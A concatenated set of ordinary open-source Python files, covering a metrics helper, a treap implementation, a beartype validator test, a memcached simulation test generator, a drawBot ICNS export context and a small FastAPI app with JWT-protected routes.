y_true, y_pred, pos_label=positive_label)
return sklearn.metrics.auc(fp_rate, tp_rate)
def acc_score(y_true, y_pred, positive_label=1):
if hasattr(sklearn.metrics, 'accuracy_score'):
return sklearn.metrics.accuracy_score(y_true, y_pred)
return float(np.sum(y_true == y_pred)) / y_true.shape[0]
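

if __name__ == '__main__':
    # Minimal usage sketch with made-up labels/scores (not part of the library).
    y_true = np.array([0, 1, 1, 0])
    y_score = np.array([0.1, 0.8, 0.4, 0.3])
    print('auc:', Evaluator(metric='auc').calculate(y_true, y_score))
    print('acc:', Evaluator(metric='acc').calculate(y_true, (y_score > 0.5).astype(int)))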
|
data_structures/trees/treap.py | vinta/fuck-coding-interviews | 590 | 11097443 | # coding: utf-8
"""
Treap
https://en.wikipedia.org/wiki/Treap
Treap is a self-balancing binary search tree which satisfies some extra properties:
- Each node has a random priority.
- Each random priority satisfies the properties of a heap.
- The parent's priority is less than or equal to children's priorities.
- The root's priority would be the minimum of the tree.
- Each of left and right subtree is also a heap.
"""
import random
class TreeNode:
__slots__ = ['_priority', 'value', 'left', 'right']
def __init__(self, value, left=None, right=None):
self._priority = random.random() # Read-only.
self.value = value
self.left = left
self.right = right
@property
def priority(self):
return self._priority
def right_rotate(self):
# root pivot
# / \ / \
# pivot gamma => alpha root
# / \ / \
# alpha beta beta gamma
# https://en.wikipedia.org/wiki/Tree_rotation
root = self
pivot = root.left
root.left = pivot.right
pivot.right = root
return pivot
def left_rotate(self):
root = self
pivot = root.right
root.right = pivot.left
pivot.left = root
return pivot
def check_validation(self):
if self.left:
assert self.priority <= self.left.priority
self.left.check_validation()
if self.right:
assert self.priority <= self.right.priority
self.right.check_validation()
class Treap:
DEFAULT_TO_ROOT = object()
NODE_CLASS = TreeNode
def __init__(self):
self.root = None
self.size = 0
def __len__(self):
return self.size
def __iter__(self):
return self.inorder_traverse(self.root)
def _search_node(self, node, value):
if not node:
return None
if value == node.value:
return node
elif value < node.value:
return self._search_node(node.left, value)
elif value > node.value:
return self._search_node(node.right, value)
def search(self, value):
return self._search_node(self.root, value)
def _insert_node(self, node, value):
if not node:
self.size += 1
node = self.NODE_CLASS(value=value)
return node
if value <= node.value:
node.left = self._insert_node(node.left, value)
if node.left.priority < node.priority:
node = node.right_rotate()
elif value > node.value:
node.right = self._insert_node(node.right, value)
if node.right.priority < node.priority:
node = node.left_rotate()
return node
def insert(self, value):
self.root = self._insert_node(self.root, value)
def _delete_node(self, node, value):
if not node:
raise ValueError('Not found')
if value == node.value:
if (node.left is None) and (node.right is None): # Leaf nodes can be simply deleted.
self.size -= 1
return None
elif node.left is None:
self.size -= 1
return node.right
elif node.right is None:
self.size -= 1
return node.left
elif node.left and node.right:
if node.left.priority < node.right.priority:
node = node.right_rotate()
node.right = self._delete_node(node.right, value)
else:
node = node.left_rotate()
node.left = self._delete_node(node.left, value)
elif value < node.value:
node.left = self._delete_node(node.left, value)
elif value > node.value:
node.right = self._delete_node(node.right, value)
return node
def delete(self, value):
self.root = self._delete_node(self.root, value)
def inorder_traverse(self, node):
if not node:
return
yield from self.inorder_traverse(node.left)
yield node.value
yield from self.inorder_traverse(node.right)
def levelorder_traverse_nodes(self, node=DEFAULT_TO_ROOT):
if node == self.DEFAULT_TO_ROOT:
node = self.root
current_level = [node, ]
while current_level:
next_level = []
for node in current_level:
if node:
yield node
next_level.extend([node.left, node.right])
current_level = next_level
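

if __name__ == '__main__':
    # Minimal usage sketch (illustrative values only).
    treap = Treap()
    for value in [5, 3, 8, 1, 4, 7, 9]:
        treap.insert(value)

    treap.root.check_validation()                 # heap property holds
    assert list(treap) == [1, 3, 4, 5, 7, 8, 9]   # in-order gives sorted order
    assert treap.search(4) is not None
    treap.delete(4)
    assert treap.search(4) is None
    print(len(treap), list(treap))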
|
beartype_test/a00_unit/a20_api/vale/_factory/test_valeisobj.py | vcokltfre/beartype | 1,056 | 11097445 | <filename>beartype_test/a00_unit/a20_api/vale/_factory/test_valeisobj.py
#!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2021 Beartype authors.
# See "LICENSE" for further details.
'''
**Beartype code-based object data validation unit tests.**
This submodule unit tests the subset of the public API of the
:mod:`beartype.vale` subpackage defined by the private
:mod:`beartype.vale._factory._valeisobj` submodule.
'''
# ....................{ IMPORTS }....................
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# WARNING: To raise human-readable test errors, avoid importing from
# package-specific submodules at module scope.
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# ....................{ CONSTANTS }....................
AS_WHEN_NIGHT_IS_BARE = (
"From one lonely cloud",
"The moon rains out her beams, and Heaven is overflow'd.",
)
'''
Arbitrary tuple to be assigned to an arbitrary instance variable of the
arbitrary class defined below.
'''
# ....................{ CLASSES ~ good }....................
class AllTheEarthAndAir(object):
'''
Arbitrary class defining an arbitrary attribute whose value has *no*
accessible attributes but satisfies a validator tested below.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
# Initialize this attribute to a shallow copy of this list rather
# than this list itself to properly test equality comparison.
self.with_thy_voice_is_loud = AS_WHEN_NIGHT_IS_BARE[:]
class WhatThouArtWeKnowNot(object):
'''
Arbitrary class defining an arbitrary attribute whose value is an instance
of another class defining another arbitrary attribute.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
self.what_is_most_like_thee = AllTheEarthAndAir()
# ....................{ CLASSES ~ bad }....................
class InAPalaceTower(object):
'''
Arbitrary class defining an arbitrary attribute of a differing name as that
defined by the :class:`AllTheEarthAndAir` class.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
self.soothing_her_love_laden = [
'Soul in secret hour',
'With music sweet as love, which overflows her bower:',
]
class TillTheWorldIsWrought(object):
'''
Arbitrary class defining an arbitrary attribute of the same name as that
defined by the :class:`AllTheEarthAndAir` class whose value has *no*
accessible attributes and does *not* satisfy a validator tested below.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
# Initialize this attribute to an arbitrary list unequal to the value
# initializing the comparable
# "AllTheEarthAndAir.with_thy_voice_is_loud" attribute.
self.with_thy_voice_is_loud = [
'To sympathy with hopes and fears it heeded not:',
'As from thy presence showers a rain of melody.',
]
class InADellOfDew(object):
'''
Arbitrary class defining an arbitrary attribute of the same name as that
defined by the :class:`WhatThouArtWeKnowNot` class whose value is an
instance of another class defining an attribute of the same name as that
defined by the :class:`AllTheEarthAndAir` class whose value does *not*
satisfy a validator tested below.
'''
def __init__(self) -> None:
'''
Initialize this object by defining this attribute.
'''
self.what_is_most_like_thee = TillTheWorldIsWrought()
# ....................{ TESTS ~ class : isattr }....................
def test_api_vale_isattr_pass() -> None:
'''
Test successful usage of the :mod:`beartype.vale.IsAttr` factory.
'''
# Defer heavyweight imports.
from beartype.vale import IsAttr, IsEqual
from beartype.vale._valevale import BeartypeValidator
# Instances of valid test classes declared above.
from_rainbow_clouds = AllTheEarthAndAir()
drops_so_bright_to_see = WhatThouArtWeKnowNot()
# Instances of invalid test classes declared above.
like_a_glow_worm_golden = InAPalaceTower()
like_a_high_born_maiden = TillTheWorldIsWrought()
scattering_unbeholden = InADellOfDew()
# Validator produced by subscripting this factory with the name of an
# attribute defined by the former class and that attribute's value.
IsInTheLightOfThought = IsAttr[
'with_thy_voice_is_loud', IsEqual[AS_WHEN_NIGHT_IS_BARE]]
# Validator produced by subscripting this factory with the name of an
# attribute defined by the latter class and the prior validator.
IsSingingHymnsUnbidden = IsAttr[
'what_is_most_like_thee', IsInTheLightOfThought]
# Assert these validators satisfy the expected API.
assert isinstance(IsInTheLightOfThought, BeartypeValidator)
assert isinstance(IsSingingHymnsUnbidden, BeartypeValidator)
# Assert these validators produce the same objects when subscripted by the
# same arguments (and are thus memoized on subscripted arguments).
assert IsSingingHymnsUnbidden is IsAttr[
'what_is_most_like_thee', IsInTheLightOfThought]
# Assert these validators accept objects defining attributes with the same
# names and values as those subscripting these validators.
assert IsInTheLightOfThought.is_valid(from_rainbow_clouds) is True
assert IsSingingHymnsUnbidden.is_valid(drops_so_bright_to_see) is True
# Assert these validators reject objects defining attributes with differing
# names to those subscripting these validators.
assert IsInTheLightOfThought.is_valid(like_a_glow_worm_golden) is False
assert IsSingingHymnsUnbidden.is_valid(like_a_glow_worm_golden) is False
# Assert these validators reject objects defining attributes with the same
# names but differing values to those subscripting these validators.
assert IsInTheLightOfThought.is_valid(like_a_high_born_maiden) is False
assert IsSingingHymnsUnbidden.is_valid(scattering_unbeholden) is False
# Assert these validators have the expected representation.
IsInTheLightOfThought_repr = repr(IsInTheLightOfThought)
assert repr('with_thy_voice_is_loud') in IsInTheLightOfThought_repr
assert repr(AS_WHEN_NIGHT_IS_BARE) in IsInTheLightOfThought_repr
# Validator synthesized from the above validators with the domain-specific
# language (DSL) supported by these validators.
IsInTheLightOfThoughtOrSingingHymnsUnbidden = (
IsInTheLightOfThought | IsSingingHymnsUnbidden)
# Assert this object performs the expected validation.
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
AllTheEarthAndAir()) is True
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
WhatThouArtWeKnowNot()) is True
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
InAPalaceTower()) is False
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
TillTheWorldIsWrought()) is False
assert IsInTheLightOfThoughtOrSingingHymnsUnbidden.is_valid(
InADellOfDew()) is False
# Assert this object provides the expected representation.
assert '|' in repr(IsInTheLightOfThoughtOrSingingHymnsUnbidden)
def test_api_vale_isattr_fail() -> None:
'''
Test unsuccessful usage of the :mod:`beartype.vale.IsAttr` factory.
'''
# Defer heavyweight imports.
from beartype.roar import BeartypeValeSubscriptionException
from beartype.vale import IsAttr, IsEqual
from pytest import raises
# Assert that subscripting this factory with the empty tuple raises the
# expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr[()]
# Assert that subscripting this factory with one non-tuple argument raises
# the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr['Among the flowers and grass, which screen it from the view:']
# Assert that subscripting this factory with three or more arguments raises
# the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr[
"Like a rose embower'd",
"In its own green leaves,",
"By warm winds deflower'd,",
]
# Assert that subscripting this factory with two arguments whose first
# argument is *NOT* a string raises the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr[
IsEqual['Till the scent it gives'],
IsEqual[
'Makes faint with too much sweet those heavy-winged thieves:']]
# Assert that subscripting this factory with two arguments whose first
# argument is the empty string raises the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr['', IsEqual['Sound of vernal showers']]
# Assert that subscripting this factory with two arguments whose first
# argument is an invalid Python identifier raises the expected exception.
with raises(BeartypeValeSubscriptionException):
IsAttr['On the twinkling grass,', IsEqual["Rain-awaken'd flowers,"]]
|
Acceleration/memcached/regressionSims/testgen/memlib_example.py | pooyaww/Vivado_HLS_Samples | 326 | 11097449 | #!/usr/bin/python
import memlib
## FORMATTING A KV-PAIR #######################################################
# V1
ShortTest = memlib.kv_pair("k", "v", "DEADBEEF", 42)
# V2
Integration1 = {
"key" : "this-is-the-key-that-i'll-be-using-for-the-next-time-to-test-the-longest-of-all-keys",
"value" : "aaaaaaaabbbbbbbbccccccccddddddddeeeeeeeeffffffffgggggggghhhhhhhhiiiiiiiijjjjjjjjkkkkkkkkllllllllmmmmmmmmnnnnnnnnooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyyyyyyzzzzzzzz",
"flags" : "0000002a", # 32bit, hex-encoded
"expiration" : 13
}
## CREATING SINGLE REQUESTS ####################################################
print "Binary Set Request"
rq = memlib.binarySetRequest(Integration1, "aabbccdd")
print memlib.simulationInput(rq)
print "Binary Set Response"
rq = memlib.binarySetResponse(Integration1, "aabbccdd")
print memlib.simulationOutput(rq)
print "Binary Get Request"
rq = memlib.binaryGetRequest(Integration1, "aabbccdd")
print memlib.simulationInput(rq)
print "2 Binary Get Request w/o delay"
print memlib.simulationInput(rq, False), # the ',' avoids the newline after print.
print memlib.simulationInput(rq)
print "Binary Get Response"
rq = memlib.binaryGetResponse(Integration1, "aabbccdd")
print memlib.simulationOutput(rq)
## CREATING FULL TESTSET #######################################################
print "Two Request @ Rate 12Gbps/1Gbps"
r1 = memlib.binarySetRequest(Integration1)
r2 = memlib.binaryGetRequest(Integration1)
print memlib.requests12Gbps([r1, r2])
print memlib.requests1Gbps([r1, r2])
r1 = memlib.binarySetResponse(Integration1)
r2 = memlib.binaryGetResponse(Integration1)
print memlib.responses([r1, r2])
print "Useful functions"
print ("%08x" % 42)
print "Key".encode('hex')
|
drawBot/context/icnsContext.py | andyclymer/drawbot | 302 | 11097455 | <filename>drawBot/context/icnsContext.py<gh_stars>100-1000
import Quartz
import os
import shutil
import tempfile
from drawBot.misc import executeExternalProcess, DrawBotError
from drawBot.context.imageContext import ImageContext
class ICNSContext(ImageContext):
fileExtensions = ["icns"]
allowedPageSizes = [16, 32, 128, 256, 512, 1024]
def _writeDataToFile(self, data, path, options):
# create a iconset folder
iconsetPath = tempfile.mkdtemp(suffix=".iconset")
try:
# get the complete pdf
pdfDocument = Quartz.PDFDocument.alloc().initWithData_(data)
pageCount = pdfDocument.pageCount()
# set the image resolution
options["imageResolution"] = 72
# make a copy and alter the resolution
options_2x = dict(options)
options_2x["imageResolution"] = 144
# start loop over all pages
for index in range(pageCount):
# get the pdf page
page = pdfDocument.pageAtIndex_(index)
# get the pdf page, this acts also as pdf document...
pageData = page.dataRepresentation()
# extract the size of the page
_, (w, h) = page.boundsForBox_(Quartz.kPDFDisplayBoxArtBox)
w = int(round(w))
h = int(round(h))
                # don't allow any other size; the iconutil command will not work otherwise
if w not in self.allowedPageSizes or w != h:
raise DrawBotError("The .icns can not be build with the size '%sx%s'. Must be either: %s" % (w, h, ", ".join(["%sx%s" % (i, i) for i in self.allowedPageSizes])))
# generate a 72 dpi png in the iconset path
pngPath = os.path.join(iconsetPath, "icon_%sx%s.png" % (w, h))
super(ICNSContext, self)._writeDataToFile(pageData, pngPath, options)
# generate a 144 dpi png in the iconset path
pngPath_2x = os.path.join(iconsetPath, "icon_%sx%[email protected]" % (w, h))
super(ICNSContext, self)._writeDataToFile(pageData, pngPath_2x, options_2x)
# collect all iconutil commands
cmds = [
"iconutil",
"--convert",
"icns",
"--output",
path,
iconsetPath,
]
# execute the commands
stdout, stderr = executeExternalProcess(cmds)
finally:
# always remove the iconset
shutil.rmtree(iconsetPath)
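# Usage sketch (illustrative addition, assuming drawBot's public drawing API):
# saving with an .icns extension routes the accumulated PDF pages through this
# context, so each page must be square and one of the allowed icon sizes.
#
#   import drawBot
#   for size in ICNSContext.allowedPageSizes:
#       drawBot.newPage(size, size)
#       drawBot.rect(0, 0, size, size)
#   drawBot.saveImage("icon.icns")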
|
app.py | sahilt20/fastapi-mongo | 120 | 11097472 | <reponame>sahilt20/fastapi-mongo
from fastapi import FastAPI, Depends
from auth.jwt_bearer import JWTBearer
from routes.student import router as StudentRouter
from routes.admin import router as AdminRouter
app = FastAPI()
token_listener = JWTBearer()
@app.get("/", tags=["Root"])
async def read_root():
return {"message": "Welcome to this fantastic app."}
app.include_router(AdminRouter, tags=["Administrator"], prefix="/admin")
app.include_router(StudentRouter, tags=["Students"], prefix="/student", dependencies=[Depends(token_listener)])
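# Run sketch (illustrative addition): serve the app with uvicorn, e.g.
# `uvicorn app:app --reload`; routes under /student then require a bearer
# token accepted by the JWTBearer dependency wired in above.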
|